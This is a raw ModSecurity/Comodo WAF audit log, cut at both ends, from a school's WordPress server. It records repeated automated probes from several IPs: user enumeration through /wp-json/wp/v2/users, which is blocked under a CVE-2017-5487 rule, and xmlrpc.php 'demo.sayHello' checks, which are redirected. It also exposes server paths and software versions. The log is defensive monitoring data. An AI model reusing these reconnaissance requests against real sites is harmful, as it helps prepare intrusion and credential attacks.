demo.sayHello --4e1f2b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e1f2b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323127021739 5628 (- - -) Stopwatch2: 1746323127021739 5628; combined=4157, p1=513, p2=3416, p3=27, p4=31, p5=99, sr=69, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e1f2b7f-Z-- --65f5675b-A-- [04/May/2025:08:45:32 +0700] aBbGvPnZiHJYHUAF8Qfb5AAAABg 103.236.140.4 35162 103.236.140.4 8181 --65f5675b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --65f5675b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65f5675b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323132144852 2411 (- - -) Stopwatch2: 1746323132144852 2411; combined=1201, p1=414, p2=759, p3=0, p4=0, p5=27, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65f5675b-Z-- --49137342-A-- [04/May/2025:08:45:34 +0700] aBbGvvnZiHJYHUAF8Qfb5QAAABQ 103.236.140.4 35164 103.236.140.4 8181 --49137342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --49137342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49137342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323134486485 1915 (- - -) Stopwatch2: 1746323134486485 1915; combined=930, p1=312, p2=592, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49137342-Z-- --75cd4a74-A-- [04/May/2025:08:45:37 +0700] aBbGwechPF6irSergtv84gAAANI 103.236.140.4 35170 103.236.140.4 8181 --75cd4a74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75cd4a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75cd4a74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323137616823 15074 (- - -) Stopwatch2: 1746323137616823 15074; combined=26488, p1=341, p2=742, p3=0, p4=0, p5=12716, sr=69, sw=0, l=0, gc=12689 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75cd4a74-Z-- --f798a601-A-- [04/May/2025:08:45:37 +0700] aBbGwechPF6irSergtv84wAAANQ 103.236.140.4 35172 103.236.140.4 8181 --f798a601-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f798a601-C-- demo.sayHello --f798a601-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f798a601-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323137913951 5624 (- - -) Stopwatch2: 1746323137913951 5624; combined=4195, p1=511, p2=3445, p3=33, p4=33, p5=101, sr=69, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f798a601-Z-- --994e9c79-A-- [04/May/2025:08:45:39 +0700] aBbGw-chPF6irSergtv85AAAANM 103.236.140.4 35174 103.236.140.4 8181 --994e9c79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --994e9c79-C-- demo.sayHello --994e9c79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --994e9c79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323139394508 4842 (- - -) Stopwatch2: 1746323139394508 4842; combined=3727, p1=478, p2=3036, p3=25, p4=23, p5=96, sr=122, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994e9c79-Z-- --4ff24239-A-- [04/May/2025:08:45:44 +0700] aBbGyGJEE9ao5dcyYWnuiQAAAIU 103.236.140.4 35182 103.236.140.4 8181 --4ff24239-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ff24239-C-- demo.sayHello --4ff24239-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ff24239-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323144541394 4891 (- - -) Stopwatch2: 1746323144541394 4891; combined=3707, p1=434, p2=3065, p3=25, p4=24, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ff24239-Z-- --d85fdb35-A-- [04/May/2025:08:45:50 +0700] aBbGzvnZiHJYHUAF8Qfb5wAAAAU 103.236.140.4 35186 103.236.140.4 8181 --d85fdb35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d85fdb35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d85fdb35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323150553599 3170 (- - -) Stopwatch2: 1746323150553599 3170; combined=1437, p1=469, p2=935, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d85fdb35-Z-- --d67da53c-A-- [04/May/2025:08:45:53 +0700] aBbG0echPF6irSergtv86QAAAMI 103.236.140.4 35190 103.236.140.4 8181 --d67da53c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d67da53c-C-- demo.sayHello --d67da53c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67da53c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323153141889 4930 (- - -) Stopwatch2: 1746323153141889 4930; combined=3944, p1=462, p2=3272, p3=28, p4=31, p5=88, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67da53c-Z-- --1528a861-A-- [04/May/2025:08:45:59 +0700] aBbG19sVQyl9V2B8Pt-wXAAAAEI 103.236.140.4 35194 103.236.140.4 8181 --1528a861-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1528a861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1528a861-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323159849947 2433 (- - -) Stopwatch2: 1746323159849947 2433; combined=1134, p1=373, p2=734, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1528a861-Z-- --8ad13379-A-- [04/May/2025:08:46:06 +0700] aBbG3vnZiHJYHUAF8Qfb6AAAAAY 103.236.140.4 35198 103.236.140.4 8181 --8ad13379-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ad13379-C-- demo.sayHello --8ad13379-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad13379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323166192735 6510 (- - -) Stopwatch2: 1746323166192735 6510; combined=4723, p1=622, p2=3855, p3=38, p4=41, p5=99, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad13379-Z-- --863e6809-A-- [04/May/2025:08:46:57 +0700] aBbHEfnZiHJYHUAF8Qfb6wAAAAg 103.236.140.4 35210 103.236.140.4 8181 --863e6809-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --863e6809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --863e6809-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323217643337 3161 (- - -) Stopwatch2: 1746323217643337 3161; combined=1294, p1=433, p2=831, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863e6809-Z-- --764ae271-A-- [04/May/2025:08:47:04 +0700] aBbHGPnZiHJYHUAF8Qfb7QAAAAo 103.236.140.4 35216 103.236.140.4 8181 --764ae271-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --764ae271-C-- demo.sayHello --764ae271-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --764ae271-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323224101990 6493 (- - -) Stopwatch2: 1746323224101990 6493; combined=4645, p1=598, p2=3804, p3=39, p4=43, p5=97, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --764ae271-Z-- --eb59e634-A-- [04/May/2025:08:47:05 +0700] aBbHGdsVQyl9V2B8Pt-wXgAAAEk 103.236.140.4 35218 103.236.140.4 8181 --eb59e634-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb59e634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb59e634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323225859409 3178 (- - -) Stopwatch2: 1746323225859409 3178; combined=1367, p1=463, p2=814, p3=0, p4=0, p5=90, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb59e634-Z-- --233fb636-A-- [04/May/2025:08:47:11 +0700] aBbHH9sVQyl9V2B8Pt-wYQAAAE4 103.236.140.4 35224 103.236.140.4 8181 --233fb636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --233fb636-C-- demo.sayHello --233fb636-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --233fb636-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323231673984 4576 (- - -) Stopwatch2: 1746323231673984 4576; combined=3582, p1=441, p2=2947, p3=22, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --233fb636-Z-- --88e3ab7c-A-- [04/May/2025:08:50:15 +0700] aBbH19sVQyl9V2B8Pt-wZgAAAFY 103.236.140.4 35246 103.236.140.4 8181 --88e3ab7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88e3ab7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e3ab7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323415187920 3428 (- - -) Stopwatch2: 1746323415187920 3428; combined=1461, p1=481, p2=948, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e3ab7c-Z-- --7cbb932e-A-- [04/May/2025:08:50:22 +0700] aBbH3vnZiHJYHUAF8Qfb7gAAAAs 103.236.140.4 35250 103.236.140.4 8181 --7cbb932e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cbb932e-C-- demo.sayHello --7cbb932e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cbb932e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323422585577 6652 (- - -) Stopwatch2: 1746323422585577 6652; combined=4749, p1=632, p2=3867, p3=38, p4=44, p5=99, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cbb932e-Z-- --46f2e361-A-- [04/May/2025:08:56:29 +0700] aBbJTfnZiHJYHUAF8Qfb9QAAABQ 103.236.140.4 35368 103.236.140.4 8181 --46f2e361-B-- GET /wp-json/wp/v2/users HTTP/1.0 